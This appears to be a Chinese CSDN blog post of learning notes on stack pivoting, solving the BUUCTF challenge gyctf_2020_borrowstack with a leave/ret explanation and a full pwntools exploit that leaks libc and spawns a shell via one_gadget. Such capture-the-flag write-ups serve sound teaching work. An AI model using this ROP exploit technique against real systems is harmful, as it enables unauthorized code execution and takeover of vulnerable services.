简单栈迁移学习笔记

最新推荐文章于 2024-03-13 21:25:44 发布
最新推荐文章于 2024-03-13 21:25:44 发布
阅读量391 收藏 2
点赞数 1
分类专栏: pwn入门笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46483584/article/details/110496924
版权

BUU gyctf_2020_borrowstack学习笔记

查看保护

gyctf_2020_borrowstack$ checksec pwn1 
[*] '/home/pwn/桌面/gyctf_2020_borrowstack/pwn1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

进入IDA

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [rsp+0h] [rbp-60h]

  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  puts(&s);
  read(0, &buf, 0x70uLL);
  puts("Done!You can check and use your borrow stack now!");
  read(0, &bank, 0x100uLL);
  return 0;
}

看到有两次read,第一次读入的buf是在栈上的,第二次读入的bank是在bss段的
这里我们能溢出的空间只有0x10,显然是不够直接rop的,栈迁移就是用在这种溢出距离不足的情况的

什么是栈迁移

大概记一下什么是栈迁移
当函数返回时,最后都要执行leave ret
这两条指令相当于:

mov esp,ebp             
pop edp                      
pop eip

假设初始函数栈:
在这里插入图片描述
mov esp,ebp
在这里插入图片描述
pop ebp 执行完这个就当与执行了leave

在这里插入图片描述
pop eip 相当于执行ret 如果有错误欢迎指正,我会及时更改
在这里插入图片描述
我们可以利用 覆盖旧的ebp,和追加一个leave ret 来进行栈迁移

假设覆盖后的栈空间
在这里插入图片描述
经过函数回调本有的 leave ret操作后

在这里插入图片描述
执行leave ret

在这里插入图片描述
栈成功迁移,一般这种迁移都迁移到bss段上,用来执行构造好的rop链

整体思路

通过第一个read栈迁移,迁移到bss段上
使用第二个read构造 rop链,泄露libc
这里要注意的是,这题的bank地址离got表很近,直接迁移会造成覆盖,无法泄露
就要将栈迁移的远一点(例如bank_addr+ 0x70)
泄露完libc用函数本身的第二个read函数回调的leave ret进行第二次迁移,往其中写入one_gadget,即可getshell

exp:

from pwn import *
io = remote("node3.buuoj.cn",27970)
elf = ELF("pwn1")
libc = ELF("libc-2.23.so")
bank_addr =0x601080
payload_1 = b"a"*(0x60)+p64(bank_addr+ 0x70)+p64(0x400699)
io.sendafter("Welcome to Stack bank,Tell me what you want\n",payload_1)
puts_plt = elf.plt["puts"]
read_got = elf.got["read"]
pop_rdi_ret = 0x400703
one_gadget = 0xf02a4
payload_2 = b"a"*(0x70)+p64(bank_addr+0x40)+p64(pop_rdi_ret)+p64(read_got)+p64(puts_plt)+p64(0x400680)
io.sendlineafter("Done!You can check and use your borrow stack now!\n",payload_2)
read_addr = u64(io.recv(6).ljust(8,b"\x00"))
libcbase = read_addr - libc.symbols["read"]
payload_3 = b"a"*(0x40)+p64(0)+p64(one_gadget+libcbase)
io.recvline()
io.sendline(payload_3)
io.interactive()

关于二次迁移的简单整理

第一次写入bss段的payload(这里的0x400680是第二个read函数的地址):

b"a"*(0x70)+p64(bank_addr+0x40)+p64(pop_rdi_ret)+p64(read_got)+p64(puts_plt)+p64(0x400680)

栈空间:
在这里插入图片描述
第一次迁移:

在这里插入图片描述
当执行完read函数 但还没执行leave ret时:

在这里插入图片描述
mov esp,ebp:
在这里插入图片描述
pop ebp:
在这里插入图片描述
pop eip:

在这里插入图片描述
getshell成功
在这里插入图片描述

Scarehehe
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【uIP官方代码】+uIP学习笔记-电路方案
04-22
uIP是一个简单好用的嵌入式网络协议,易于移植且消耗的内存空间较少,非常适合学习和使用。可以肯定的说uIP是嵌入式以太网学习的好起点,但不一定是终点。uIP的功能远不如LwIP强大,但两者并没有孰优孰劣之分,uIP...
BUUCTF gyctf_2020_borrowstack
BengDouLove的博客
04-22 806
第一个read的只能溢出0x10字节,也就是刚好覆盖返回地址,如果要ROP地方肯定不够 所以迁移到bank,在那里ROP 之前没遇到过这样的题,怎么迁过去我苦思冥想,最终还是看了wp,,用两个leave来控制rsp和rbp寄存器,太妙了 leave是个伪代码,,分解开就是 mov rsp,rbp pop rbp 如果把构造成这样 ‘A’ * 0x60 bank_addr leave_...
迁移原理介绍与应用
weixin_39529207的博客
02-20 5011
本文将对CTF Pwn中「迁移」(又称「转移」)这一技术进行介绍与分析,希望读完本文后以下问题将不再困扰你: 什么是迁移? 迁移解决了什么问题? 怎么使用迁移这个技巧? 开始之前,有如下预备知识会极大提升你的阅读体验: CTF Pwn是在做什么?提权(Getshell)是什么意思? 在操作系统内存布局中,是一种怎样的结构,具有怎样的特点? x86中常用寄存器的名称与作用?函数调用的原理与过程是怎样的? 溢出攻击的核心技巧是什么? 溢出是怎么回事?  在预备知识的4个问
迁移(leave ret)(更适合pwn宝宝体质的迁移~)
Kata_Jhin的博客
05-15 1701
更适合pwn入门新手体质的迁移教程
迁移总结
最新发布
2302_79899078的博客
03-13 1242
迁移,orw
PWN——迁移
L2329794714的博客
08-29 1541
简单一句话就是控制esp指针的指向。实现指令:eave;ret 指令Leave等价于:其实就是在做恢复上一次空间的操作。但这过程中能恢复到上次的的关键数据为当前ebp指向地址上值(oldebp),当我们通过溢出覆盖原本的oldebp值时,然后将leave;ret 程序段地址放在返回地址上,那么就可以实现将esp迁移至我们想要的地方(取决于oldebp上的覆盖的地址,注意这里会抬高4字节,64位抬8字节)。第一次leave第一次ret:因为esp还是指向leave;.........
第一行代码笔记
06-20
- `SQLiteOpenHelper`提供了一种方便的方式来管理数据库的版本升级过程,当数据库版本发生改变时,会自动调用`onUpgrade()`方法进行数据迁移。 以上是《第一行代码》笔记中提到的一些重要知识点的总结和扩展,涵盖...
基于MFC和Sqlite3开发的简单笔记程序
09-16
【标题】"基于MFC和Sqlite3开发的简单笔记程序"揭示了这个项目的核心技术,即Microsoft Foundation Classes(MFC)框架和Sqlite3数据库引擎,用于创建一个简单笔记应用程序。MFC是微软提供的C++类库,用于简化...
ssm课程笔记.pdf
05-23
Spring Boot的版本号说明了该课程所涉及的Spring Boot框架的技术水平,2.X版本代表的是较新的技术,这意味着学习的内容会包含对新特性和改进的介绍。Spring Boot 2.X不仅包含了对Java 8及以上版本的全面支持,还...
Notes:使用美观的UI做笔记
05-05
描述简单明了,“笔记 使用美观的UI做笔记”,进一步确认了项目的重点是开发一个不仅实用,而且在视觉上令人愉悦的笔记应用。 标签揭示了技术,包括: 1. Python:这可能是后端的主要编程语言,用于处理数据存储...
迁移浅析
qq_43409582的博客
11-23 4015
0x00 线下有道迁移的题目,因为当时没有好好学,对于迁移这一块儿一知半解的,就没出,痛定思痛,在此就好好研究一下。 0x01 前置知识 首先迁移就是因为可写空间太小不够rop,就把迁移到别的地方去构造payload。 而迁移最重要的是两个汇编命令 leave; ret; leave相对于是mov esp,ebp;pop ebp; ret是pop eip; 0x02 stack pivoting 先从32位来理解迁移的利用原理。 stack pivoting,正如它所描述的,该技巧就是劫持指针
迁移图解
qq_40410406的博客
11-11 1476
迁移 场景 1 如果程序的保护措施canary开启,会在prev ebp空间的下一个低地址存放一个随机值,当我们溢出时会将这个随机值覆盖,程序检测到这个随机值发生变化以后会自动退出(崩溃),此时就无法进行溢出攻击,所以需要另寻出路。 2 溢出长度不足以使用直接 ROP 3 溢出 payload 会出现空字符截断,且gadget地址含有空字符 4 在泄露地址信息后需要新的 ROP payload 5 如果开启了不可执行保护,就需要迁移到bss段或者data段或者其他位置执行我们的gadge
pwn入门之迁移
wangxunyu6的博客
03-08 1260
迁移可以用于处理溢出的情况。当溢出且可溢出长度不足以容纳 payload 时,可以通过迁移来构建一个新的空间以放下 payload。
迁移(ciscn_2019_es_2)
菊花的老窝
05-03 431
迁移顾名思义就是将原来的程序迁移到另一个地方,使得我们可以将构造的 ROP 链完整的填入。那么想要修改的位置,那么就需要修改寄存器 esp 和 ebp 的值。想要修改 esp 和 ebp 的值,我们需要用到leave和ret两个 gadget。
迁移:三种利用方法
2302_79813730的博客
02-03 1078
迁移一般用于溢出字节不够,但至少溢出0x10个字节,也就是用来覆盖rbp及返回地址,一般有两种方向:迁向原来的的,迁移到bss段。在学习迁移之前,需要了解一下一个汇编指令:leave ret,他的作用可以拆分成两部分:mov rsp rbp pop rbp。leave ret的作用是用来清空的,在主函数最后都会有,但如果用两次会有怎样的效果呢借用了这篇。
ctf pwn 题目
m0_64195960的博客
04-11 1376
2022年3月21迁移 这道题是迁移 1)先checksec一下 嗯哼哼,貌似影响不大 2)丢在ida里瞅 1、main() 没啥用再看看其它的 2、vul() 第一个read读进去的东西,可以被printf呸!吐出来! 芜湖!看到了第二个read可以溢出,但是可以溢出的空间太少! ————————那么就要来到了,刚学习的迁移—————————— 3、hack() 芜湖看到system函数了,那我们就可以获得system的返回地址从而调用.
迁移学习
weixin_73481933的博客
02-20 203
参考资料https://blog.csdn.net/qq_38154820/article/details/106330238。
【PWN · 迁移】[BUUCTF][Black Watch 入群题]PWN
Mr_Fmnwon的博客
08-01 393
进能够覆盖ebp和ret,很难不往迁移上想。 修改ebp和ret后我们可以将指针指向另一处地址addr,需要ebp修改为ebp-4和ret修改为leave;ret地址。这是触发迁移的基本过程。 查看整个代码发现没有后门函数。 2.泄露libc 没有system函数的使用,但是有write函数。我们可以通过write泄露write的真实地址,从而泄露libc的地址。进一步可以拿到system和str_bin_sh的地址。 3.组合流程① read大量数据,可以是 aaaa + write.pl
pwn--迁移
weixin_44642009的博客
04-17 962
迁移–ROP 本次实验我们使用lab4的可执行文件。 在开始之前我们需要明确一些问题以及需要注意的地方,以下我会讲到,这也是在实验过程中我碰到的一些情况和解题关键: 为什么使用迁移? 由上图可知,程序开辟的堆大小是0x50字节,而read函数输入可以输入0x60字节,明显存在溢出的可能,不过可输入的字节数不是足够多,空间较小,不足以使我们填入足够的ROP链,所以我们需要迁移。 ...
矩阵理论A笔记:赵迪教授迁移学习解析
"dx_d-《迁移学习:域自适应理论》综述论文...这篇综述论文结合矩阵理论的笔记,提供了关于迁移学习和域自适应理论的背景知识,同时深入探讨了矩阵理论的基础概念,为理解这些复杂的机器学习技术提供了坚实的数学基础。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值